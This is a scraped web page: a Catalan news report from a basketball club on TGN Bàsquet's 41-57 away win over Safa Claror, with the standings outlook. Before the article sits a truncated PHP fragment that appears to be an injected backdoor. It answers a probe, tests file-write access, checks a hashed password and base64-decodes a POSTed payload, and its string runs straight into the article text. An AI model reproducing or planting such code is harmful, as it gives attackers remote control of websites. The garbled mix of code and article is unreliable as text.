function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet guanya a domicili un intens partit contra el Safa Claror (41-57) - Tgn Bàsquet Club -

El TGN Bàsquet guanya a domicili un intens partit contra el Safa Claror (41-57)

Updated: maig 22, 2021

El TGN Bàsquet ha aconseguit una merescuda victòria contra el Safa Claror que no ha posat les coses fàcils en cap moment. Les liles han tirat endavant un partit en el qual la comoditat ha brillat per la seva absència, tenint en compte que en l’anada les liles van dominar durant tot el matx (65-35).

El marcador a l’inici del partit ha estat molt igualat. El Safa Claror ha demostrat que volia donar-ho tot en el seu últim partit a casa. No ha estat fins al final de primer període que les liles han aprofitat els errors defensius per anotar des de la línia de tres (14-21).

Ha sigut al segon quart quan les tarragonines han fet una gran defensa i han seguit sumant punts al marcador tot i la dura defensa rival que ha aprofitat la passivitat arbitral. Han parat amb èxit les ofensives de les barcelonines que tan sols han aconseguit fer quatre punts, un parcial clau que els ha donat aire, amb un marcador favorable 18-34.

A la tornada del descans el Safa Claror ha fet trontollar els atacs liles amb la seva dura defensa. S’acabava el quart amb un parcial 12-7 que ha escurçat diferències al marcador (30-41). Les locals no han tirat la tovallola i en l’últim període han arribat a posar-se vuit punts per sota les sèniors del TGN. Però el ritme ofensiu lila ha desmuntat la pressió defensiva i ha acabat sentenciant el matx amb un clar 41-57.

Ara el TGN ha d’estar més que satisfet amb els resultats obtinguts durant aquesta temporada i no pot fer res més que esperar al final del partit de demà entre el Joventut les Corts i el CB Roser. Recordem que si el Joventut guanyés les liles quedarien segones de la classificació i per tant jugarien la desitjada final a vuit. Tot i el que pugui passar les jugadores han d’estar molt orgulloses del difícil camí que han hagut de recórrer per arribar fins aquí i han de tenir clar que per a nosaltres ja han fet història.